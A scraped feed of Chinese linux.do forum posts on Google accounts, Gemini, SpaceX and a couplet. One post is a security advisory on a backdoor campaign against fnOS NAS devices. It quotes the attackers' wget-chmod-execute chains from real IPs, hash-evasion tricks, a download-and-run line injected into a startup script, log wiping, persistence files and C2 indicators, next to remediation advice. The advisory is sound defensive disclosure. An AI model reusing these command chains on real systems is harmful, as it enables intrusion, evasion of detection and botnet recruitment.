标题: 谷歌暗网报告
作者: #sauterne
板块: #搞七捻三
编号: 1549605
帖子: https://linux.do/t/topic/1549605
时间: 2026-01-31 21:08:52
摘要:

这个意思是如果我被悬赏了 会告诉我一下吗

标题: 原 富可 敌国 coord code 直接诋毁论坛
作者: #pry周内在
板块: #搞七捻三
编号: 1549608
帖子: https://linux.do/t/topic/1549608
时间: 2026-01-31 21:09:45
摘要:

标题: gemini pro 学生资格咨询
作者: #ruixuey
板块: #开发调优
编号: 1549613
帖子: https://linux.do/t/topic/1549613
时间: 2026-01-31 21:10:42
摘要:

佬们   gemini pro 学生资格是确定延期到 4 月 30 号了嘛 还是说今天过 12 点就无了

标题: 最近 Google 登录总是被反复要求验证，怎么减少频率呢？
作者: #Thomas Liu
板块: #开发调优
编号: 1549622
帖子: https://linux.do/t/topic/1549622
时间: 2026-01-31 21:12:34
摘要:

我最近一年遇到一个很烦的情况：我每天需要用 Google 账号登录/授权很多网站，但经常会被 Google 额外弹出验证页面，常见两种验证方式：

提示我“在 iPhone 上打开 Gmail 应用”来确认
要求我打开身份验证器输入验证码

因为我登录次数很多，这个验证触发得非常频繁，影响效率。我换其他 Google 账号也是同样的情况。
我不确定原因是：

Google 账号被风控/风险评分高了？
我的账号哪里开了什么设置导致反复验证？
网络环境问题（我长期用同一家的机场，美国 IP，可能出口会变）？

补充：我不想关闭 2FA（安全性还是要的），只是想减少这种“每次授权都要验证”的频率。
想请教大家：

有人遇到类似问题吗？最终怎么解决的？
IP 变化会不会是主要原因？
浏览器（我用的 Arc Browser）会不会导致 Google 记不住“已信任设备”？

谢谢！

标题: 写了一个 base64 图片预览的 web 工具（纯 HTML，可本地部署）
作者: #leon
板块: #开发调优
编号: 1549643
帖子: https://linux.do/t/topic/1549643
时间: 2026-01-31 21:18:01
摘要:

因为测试 nano banana api 接口需要，所以临时让 gemini 写了一个 base64 图片预览工具，仓库如下：

  

      github.com
  

  
    
  

  GitHub - poixeai/base64-image-viewer: 把 Base64（或 Gemini Nano Banana 的 JSON...

    把 Base64（或 Gemini Nano Banana 的 JSON 响应）一键解析成可预览的图片。


  

  
    
    
  

  


粘贴 Base64 图片字符串，或者 Gemini Nano Banana 的完整 JSON 响应体，直接渲染预览图片。
纯 HTML + CSS + JS，本地双击打开工具页面就可以用了。

顺便感慨一句：AI 时代做这种小工具的成本真的低——“让 AI 写一个”往往比以前去 GitHub / 搜索引擎翻半天更快。

标题: 悲报,前几天自己创的gooogle学生号,每个号拉满了家庭组,今天检查一看10个号掉了4个
作者: #agi_is_coming
板块: #搞七捻三
编号: 1549658
帖子: https://linux.do/t/topic/1549658
时间: 2026-01-31 21:21:45
摘要:

这10个号我还没开始反代出来用,就掉了4个

标题: cc回滚功能明明选了代码回滚，为啥还是只有对话回滚？
作者: #liyiran
板块: #开发调优
编号: 1549668
帖子: https://linux.do/t/topic/1549668
时间: 2026-01-31 21:22:47
摘要:

各位佬，为啥我每次使用rewind功能，要求代码回滚，但是最后回滚的都只有对话，代码是一点没变啊？这功能到底有没有用啊？

标题: Gemini Pro掉了 有地方申诉吗？可以申诉吗？
作者: #sauterne
板块: #福利羊毛
编号: 1549686
帖子: https://linux.do/t/topic/1549686
时间: 2026-01-31 21:26:18
摘要:

在tg群看到有人说在研究如何申诉，我咋连申诉的地方都没看到呢？
有佬友了解吗？我没找到申诉的入口

标题: SpaceX申请部署100万颗卫星
作者: #拾雨
板块: #前沿快讯
编号: 1549694
帖子: https://linux.do/t/topic/1549694
时间: 2026-01-31 21:28:53
摘要:

据美国《个人电脑杂志》网站1月31日报道，马斯克旗下的太空探索技术公司（SpaceX）申请发射多达100万颗卫星，以建立一个环绕地球的轨道数据中心网络。
1月30日，SpaceX向美国联邦通信委员会提交了申请，将该项目描述为“一个拥有前所未有的计算能力的卫星星座，可为先进的人工智能（AI）模型及其相关应用提供支持”。
报道称，该计划规模惊人，远超马斯克现有的“星链”星座，后者目前在地球轨道上拥有超过9600颗卫星。
马斯克在社交平台X上转发了关于SpaceX申请发射多达100万颗卫星的报道。
来源：参考消息

标题: 重要/漏洞和应急建议汇总：飞牛 fnOS 疑似遭公网未授权访问/利用后植入后门组件和应急建议
作者: #balfourbaines
板块: #开发调优
编号: 1549700
帖子: https://linux.do/t/topic/1549700
时间: 2026-01-31 21:31:36
摘要:

一、重要/漏洞：飞牛 fnOS 疑似遭公网未授权访问/利用后植入后门组件
1.漏洞编号：暂无（官方未公开 / 未分配 CVE）
重要等级：严重（高危）
CVSS 分数：暂无
2.影响范围：
fnOS 设备存在公网可达入口（端口映射/反代/直连公网）时风险显著上升；官方建议升级至 1.1.15 并验证关闭公网映射后异常是否停止。
论坛反馈即使仅使用 HTTPS 访问也可能出现同类驻留现象，说明风险不应仅限定为 HTTP 明文通道（可能存在其他公网暴露面、历史入侵残留或服务端漏洞可经 HTTPS 触发）
3.受影响系统：
fnOS（版本范围未公开）。官方社区回复称该问题官方已知，建议升级至 1.1.15，并在关闭公网端口映射后验证异常上传/连接是否停止。
4.木马行为分析
目前已获取相关木马文件，下为行为分析
4.1 入侵者在通过未公开入口/利用链投放后门下载器后并执行
下载二阶段载荷并执行（观测到的命令链）
cd /tmp
wget http://20.89.168.131/nginx
chmod 777 nginx
head -c 16 /dev/urandom >> nginx（向文件追加随机字节，改变哈希，规避基于哈希的检测）
./nginx
wget http://20.89.168.131/trim_https_cgi
chmod 777 trim_https_cgi
head -c 16 /dev/urandom >> trim_https_cgi
./trim_https_cgi
外联与拉取补充组件
HTTP：GET http://151.240.13.91/trim_fnos
TCP：连接 45.95.212.102:6608
4.2 后门驻留组件 gots
A1. 写入后门主体与持久化文件
创建/写入：/sbin/gots
创建/写入：/etc/rc.local、/etc/rc.d/rc.local
创建/写入 systemd 服务（变种服务名）：
/etc/systemd/system/x86.service
/etc/systemd/system/.service
执行持久化：systemctl enable .service（含重定向到 /dev/null 的静默执行）
自身复制/改名落地：
/usr/bin/x86（样本发生目录重命名/落地）
/usr/bin/（样本发生目录重命名/落地）
A2. C2 通信与探测
DNS：解析 aura.kabot.icu → 45.95.212.102
TCP：连接 45.95.212.102 多端口（观测到：3489、5098、6608、7489）
论坛样本显示的附加行为（strings/排查结论）
干扰系统工具：重命名/替换 cat（出现 mv /usr/bin/cat /usr/bin/cat2 等字符串，导致“cat 丢失”现象）
结束系统进程：pkill -f ‘network_service|resmon_service’
修改持久化入口：改写 /etc/rc.local 与 /etc/systemd/system/%s.service 并 systemctl enable
外联：包含 45.95.212.102 字符串并进行访问
4.3 组件 trim_https_cgi
清理痕迹
清空多目录日志：/var/log/、/usr/trim/logs/、/run/log/journal 等
删除审计日志：/var/log/audit/audit.log 及滚动文件
删除/清理安全相关日志：/var/log/secure*、/var/log/messages*、wtmp/btmp/lastlog 等
干扰业务与恢复功能
结束服务：pkill -f backup_service、pkill -f sysrestore_service 等
二阶段下载执行与启动脚本注入
修改 /usr/trim/bin/system_startup.sh，追加下载执行链：
wget http://151.240.13.91/turmp -O /tmp/turmp ; chmod 777 /tmp/turmp ; /tmp/turmp
端口相关痕迹与疑似隐藏监听（来源于论坛排查）
目标系统存在 0.0.0.0:57132 LISTEN，ss/netstat 无 PID，lsof/fuser 无结果
trim_https_cgi 字符串包含 57132，并出现 kill -9 $(lsof -t -i:57132) 之类处理逻辑（提示该端口为其链路的一部分）
4.4 内核模块 snd_pcap（论坛排查）
/etc/modules 被追加 snd_pcap
模块文件：/lib/modules/6.12.18-trim/snd_pcap.ko
与“57132 监听无 PID/无 lsof 结果”的现象存在关联怀疑（疑似内核层隐藏/驻留能力）
关键落地痕迹
不可变属性（immutable，需先 chattr -i 才能删除）：
/usr/bin/nginx
/usr/sbin/gots
/usr/trim/bin/trim_https_cgi
/etc/systemd/system/nginx.service
/etc/systemd/system/trim_https_cgi.service
/etc/rc.local
伪装/复用：/usr/bin/nginx 与 /usr/sbin/gots md5 相同（同一载荷多名称投放）
rc.local 自启：/sbin/gots x86 &
systemd 自启（示例）：ExecStart=/usr/bin/nginx x86（oneshot + enable）
可疑网络基础设施（IOC）
IP：45[.]95[.]212[.]102（C2/多端口连接）
IP：151[.]240[.]13[.]91（HTTP 拉取二阶段：/trim_fnos、论坛样本）
域名：aura[.]kabot[.]icu（解析到 45[.]95[.]212[.]102）
下载源：20[.]89[.]168[.]131（HTTP 拉取：/nginx、/trim_https_cgi）
归属信息：45[.]95[.]212[.]102 与 151[.]240[.]13[.]91 两个 IP 均归属 AS209554  ISIF OU 提供商网段
4.5 处置建议

关闭公网端口映射/源站直通。
升级 fnOS 至官方建议版本（1.1.15 或更高）。
出口防火墙封禁：45.95.212.102、151.240.13.91，同时监控连接数与上传是否回落。
轮换所有管理口令/密钥；检查容器、计划任务、数据盘是否存在触发残留（官方提示“重装后仍可能再次触发”）。

二、建议：请立即停止公网暴露 fnOS Web 管理页面


我们通过联系多位遭遇入侵的用户并分析相关记录发现，本次针对 fnOS 的漏洞利用活动呈现多团伙、多基础设施特征：疑似存在 2–3 个利用团伙，攻击流程较为成熟，并观察到多个 C2（命令与控制）域名用于回连与任务下发。当前已明确捕捉到 DDoS 攻击指令，被入侵设备存在被纳入僵尸网络风险。


根据网络空间测绘（网站空间）统计，全网可直接访问并暴露 fnOS Web 页面设备约 306,766 台。
注意：该数字来自公开测绘快照，受扫描时间点、动态公网 IP、端口映射/反代、去重口径等影响，实际暴露规模可能与该值不一致，仅用于风险态势评估。


时间线


3.1 最早入侵记录：约 12 天前（1 月 19 日左右）
3.2 用户察觉异常：约 10 天前（1 月 21 日左右），主要因设备出现对外异常行为（含对外攻击/连接异常增多）导致网络不稳定而被发现
3.3 1 月 21–22 日期间观测到任务/指令下发行为
3.4 综合判断：攻击者至少利用了约 3–4 天“空窗期” 在用户察觉前完成感染、持久化与回连准备
3.5 官方侧：据反馈，官方约在 1 月 21 日左右因用户集中反映“建立大量连接、网络不稳定”等现象，才进一步定位并确认漏洞风险

强调

4.1 所有用户立刻停止公网暴露 fnOS Web 管理页面。
4.2 这是当前最关键、最有效的止损措施。无论是否升级、是否自查“暂未发现异常”，都不要再让 Web 管理面可被公网直接访问。
4.3 “升级到新版本”并不等于风险解除。
目前无法确认新版本已覆盖全部修复点，仅依赖升级不能作为安全保证；在 Web 仍暴露公网的情况下仍可能被再次利用或二次入侵。
4.4 官方目前未公开可复用、可验证的完整处置方案。
4.5 因此不建议在联网状态下“边运行边清理”。
4.6 不要指望“屏蔽某个 IP / 屏蔽单个 C2 域名”解决问题。
已确认存在多个 C2 域名/基础设施轮换，单点封堵不一定有效，且可能快速失效。
4.7 已捕捉到 DDoS 指令：被控设备可能被用来对外攻击。
这不仅会造成你的网络被打满、设备性能异常、业务不可用，也可能引发运营商封禁。
三、处置
A1. 未发现入侵迹象的用户：
1.立即关闭公网访问，撤销端口映射/公网反代/暴露端口；仅允许内网访问，或使用 VPN/零信任网关进入内网后访问管理面；在网

标题: Cloudcone 收到官方回复了，数据恢复不了了
作者: #George
板块: #搞七捻三
编号: 1549708
帖子: https://linux.do/t/topic/1549708
时间: 2026-01-31 21:34:15
摘要:

Cloudcone 收到官方回复了，数据恢复不了了，我去找黑客交易了 …
有人知道这个怎么申请索赔吗？
还有为啥cloudCone 官网又登不上了，验证码不显示

标题: 上联“佩兰一丈青”，有谁对下联?
作者: #倾风
板块: #搞七捻三
编号: 1549714
帖子: https://linux.do/t/topic/1549714
时间: 2026-01-31 21:38:15
摘要:

对对子：庙小无僧风扫地 
  

搞七捻三
    
  
  
    听说 L 站文人雅客遍地，请试对此下联：庙小无僧风扫地。从 X 上看来的，不过感觉都对得不太好。此联难点我认为一在意境无敌（孤寂苍凉），二在前四字合理性（因为庙小所以无僧），三在后四字的拆解上（风扫地，风缘何扫地，无僧；僧可扫地，风亦可扫地，言风之大也）。
  


刚看到有佬发对联，突然想起来我也有一个对联搁置着


知乎上的那个相同问题也是我的账号提问的，好几年了


（佩兰 一种植物 也是当时的中国足球队教练 外国人，一丈青 一种植物 也是古代小说水浒传扈三娘的称号 ，兰通蓝 青出于蓝而胜于蓝，上联有古，今，中，外 4种意象）